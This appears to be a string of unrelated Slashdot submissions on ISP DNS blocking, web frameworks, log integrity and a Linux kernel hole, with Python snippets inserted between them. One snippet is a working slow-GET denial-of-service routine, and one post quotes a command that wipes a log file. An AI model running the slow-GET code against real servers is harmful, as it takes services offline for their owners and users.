writes "It appears that Comcast is killing BitTorrent use by blocking DNS to BitTorrent users.
For the past week, I've been having issues with my Comcast cable where everything "works fine" except DNS. Even setting up my own caching name server did not help, since UDP port 53 was a black hole as far as the public Internet was concerned. Resetting the modem/router fixed it, only to have the problem recur anywhere from a few hours to a day later.
Last Friday I noticed BitTorrent running on my Mac, sharing only a CentOS ISO image, and killed it. I haven't had a problem since. Can anybody corroborate this apparently new tactic being used by Comcast to censor BitTorrent use?"
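For anyone who wants to check whether their own port 53 is being black-holed, a probe along these lines distinguishes a dead UDP path from an ordinary resolver problem. This is a minimal sketch: the resolver address and hostname are placeholders, and the function names are mine, not from the submitter.

```python
import socket
import struct

def build_dns_query(name, txid=0x1234):
    """Build a minimal DNS A-record query packet (RFC 1035)."""
    # Header: transaction id, flags (RD=1), QDCOUNT=1, AN/NS/AR counts = 0
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    # Question: length-prefixed labels, null terminator, QTYPE=A, QCLASS=IN
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    return header + qname + struct.pack(">HH", 1, 1)

def udp53_reachable(server="8.8.8.8", name="example.com", timeout=3.0):
    """Return True if the resolver answers over UDP/53, False on timeout.

    A black-holed port 53 looks exactly like a timeout: the query leaves,
    nothing ever comes back.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_dns_query(name), (server, 53))
        sock.recvfrom(512)
        return True
    except socket.timeout:
        return False
    finally:
        sock.close()
```

If this returns False while TCP connections to known IP addresses still work, you are seeing the "everything works except DNS" symptom described above.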
writes "About a month ago, a story broke that HTTP servers (Apache, IIS, and everything else out there) were susceptible to a "slow POST" attack, where a malicious client starts a connection to a web server, sends headers indicating a very large upload via POST, and then sends that upload very slowly, starving resources and eventually causing a denial of service.
Well, today, doing some research to see how effective this attack was (hint: VERY effective), I tried the same thing using an HTTP GET as well, and saw very similar results. With a simple, 20-line PHP script run from my laptop, I was able to take a fairly beefy internal web server (8 cores, 12 GB RAM, CentOS 5) offline in just under a minute, and keep it that way for as long as I wanted to. The technique was simple: send "GET /" and then append letters, one or two every second or so. After several hundred simultaneous connections were established, the web server was no longer responsive. I don't have an IIS server to test against, and don't feel like using any "unwitting volunteers."
It doesn't take a large botnet to take most hosts offline; it takes only a single, relatively low-powered laptop and a 20-line script hacked up in PHP 5. Given that the "slow POST" attack is already well known, it's only a matter of time before a black hat discovers that even disabling form POSTs won't protect anybody, either!"
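The submitter's 20-line PHP script isn't included, but the trickle technique described above can be sketched in a few lines of Python. The function name, parameters, and trickle payload below are illustrative only; the one-byte-per-second pacing is taken from the write-up. The point is how little each connection costs the attacker versus the worker it ties up on the server.

```python
import socket
import time

def slow_get(host, port, trickle=b"aaaaaaaaaa", delay=1.0):
    """Open one connection and dribble a GET request one byte at a time.

    The server cannot distinguish this from a genuinely slow client, so it
    keeps the connection (and a worker) tied up until the request completes
    or a read timeout fires. Run a few hundred of these concurrently and a
    thread- or process-per-connection server runs out of workers.
    """
    sock = socket.create_connection((host, port))
    sock.sendall(b"GET /")           # start the request line, never finish it
    for byte in trickle:
        time.sleep(delay)            # "one or two every second or so"
        sock.sendall(bytes([byte]))  # still mid-request from the server's view
    return sock                      # left open; the caller decides when to close
```

As with the submitter's test, this only belongs on hardware you own; no "unwitting volunteers."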
writes "Dear Slashdot,
This is the only way I can think of to actually send a communication to you. I noticed tonight a checkbox labelled: "As our way of thanking you for your positive contributions to Slashdot, you are eligible to disable advertising."
Well, I'm not going to check it. I've spent years writing my often +modded posts, and have enjoyed doing it! Your advertising is subtle enough not to detract needlessly from the experience, you get a few pennies from my daily views, and I have purchased more than one item due to an ad posted on Slashdot. It's a win/win/win situation, and I will not be checking the button, nor do I steal content from websites by using products like Adblock. If a website posts ads intrusively, I avoid that site, rather than legitimize an offensive website by giving it the benefit of my eyeballs.
Thank you, Slashdot, for maintaining a high-quality, highly relevant site for over 10 years now! I've not paid a thin dime for any of your content, and I have spent countless hours pontificating on finer points; you have more than deserved whatever revenue you get from your classy, unobtrusive ad impressions!"
writes "Looks like a pretty serious hole has been found in Linux — affecting 32- and 64-bit versions of Linux, with and without SELinux, using a creative way to exploit null pointer dereferences. You can check it out yourself. As of this writing, there are no patches available, making it a potential zero-day exploit."
writes "For the past 6 years or so, we've been heavily developing a proprietary, custom vertical application based on Linux, Apache, PHP, and PostgreSQL in a home-rolled PHP framework based loosely on Horde. We've been quite successful in the marketplace with our relatively classic technology based on HTML 3.x.
Now we're looking at modernizing the front end with one of the many JavaScript frameworks out there. So, which is the best, and why? Which should be avoided? Here are some of the frameworks I've seen so far:
Dojo, Ext JS, Fleejix.js, jQuery, MochiKit, Modello, MooTools, Prototype, Qooxdoo, Rico, and Scriptio. So far in my research, jQuery and/or Prototype seem to be the front runners, with Dojo perhaps a close second.
I'd be most interested in the opinions of people who have switched from one framework to another, and why?"
writes "I'm revamping our web-based application and am currently reviewing options for logging, particularly with redundant, clustered hosting solutions. I've run into a few problems that no amount of online searching seems to have solved.
My first concern is scalability: our application writes directly to local log files. Unfortunately, many of the log entries are quite large, and so cannot be piped through syslogd. Other options are much heavier, come with significant administration overhead, or introduce bottlenecks. Is there a syslogd replacement that will allow for very large (tens of KB or larger) log entries?
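Classic BSD syslog caps messages at roughly 1 KB, which is the limit being hit here; newer daemons such as rsyslog and syslog-ng can raise the per-message ceiling, especially over TCP. Failing that, one workaround is to split oversized entries into sequence-numbered, syslog-sized chunks and reassemble them on the collector. The framing below is invented for illustration, not part of any syslog standard:

```python
def chunk_entry(entry_id, payload, max_msg=1024):
    """Split one oversized log entry into numbered, syslog-sized pieces.

    Each piece carries "id seq/total " so the collector can reassemble
    regardless of delivery order; 64 bytes are reserved for that header.
    """
    body = max_msg - 64
    total = max(1, -(-len(payload) // body))  # ceiling division
    return [f"{entry_id} {i + 1}/{total} " + payload[i * body:(i + 1) * body]
            for i in range(total)]

def reassemble(pieces):
    """Rebuild the original payload from chunk_entry() output (any order)."""
    parsed = []
    for piece in pieces:
        _ident, seq, rest = piece.split(" ", 2)
        idx, _, _total = seq.partition("/")
        parsed.append((int(idx), rest))
    return "".join(rest for _, rest in sorted(parsed))
```

Each chunk fits under the traditional limit, so existing syslog transport can carry it; the cost is reassembly logic and an entry ID unique enough to keep interleaved entries from different hosts apart.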
My next question is about logfile integrity. A perfect log file is write-once, never rewritten: a one-way street where data goes in, gets saved, and never gets deleted. But any log file is essentially just a file, and a single # echo "" > /path/to/log will kill the log file dead. Yes, you can log remotely, but this increases complexity and therefore the chances of failure; and what if your remote log server is also compromised? I've been considering the use of a CD-R, especially the drive's ability to recover from a buffer underrun during a write sequence. I've simulated a few, tying up the HDD with I/O while burning a CD-R. It under-ran, renegotiated, then resumed writing without incident. Why not use this capability, leave the drive in a sort of permanent under-run, and renegotiate for each log entry? Wouldn't doing so create a file that could not effectively be erased, even if the host was compromised?"
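A software-side complement to the write-once-media idea (a sketch, not a substitute for it) is to hash-chain the entries: an attacker with root can still destroy the log, but any rewrite or mid-file deletion breaks every later link and is therefore detectable. The function names and chain format here are mine:

```python
import hashlib

def append_entry(chain, message):
    """Append a log entry whose hash covers the previous entry's hash.

    chain is a list of (hex_digest, message) pairs. Because each digest
    folds in its predecessor, altering or removing any earlier entry
    invalidates every entry after it.
    """
    prev = chain[-1][0] if chain else "0" * 64
    digest = hashlib.sha256((prev + message).encode()).hexdigest()
    chain.append((digest, message))
    return chain

def verify(chain):
    """Return True iff every link matches its predecessor's digest + message."""
    prev = "0" * 64
    for digest, message in chain:
        if hashlib.sha256((prev + message).encode()).hexdigest() != digest:
            return False
        prev = digest
    return True
```

One caveat: truncating the chain from the end is undetectable from the file alone, so the latest digest still needs to be anchored somewhere off-host (which is exactly the niche the permanently under-running CD-R is meant to fill in hardware).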
writes "Scientology is attempting to stop Anonymous from marching this weekend, Saturday the 15th, by filing a request for a restraining order, in what can only be described as the latest development in Scientology vs. The Internet."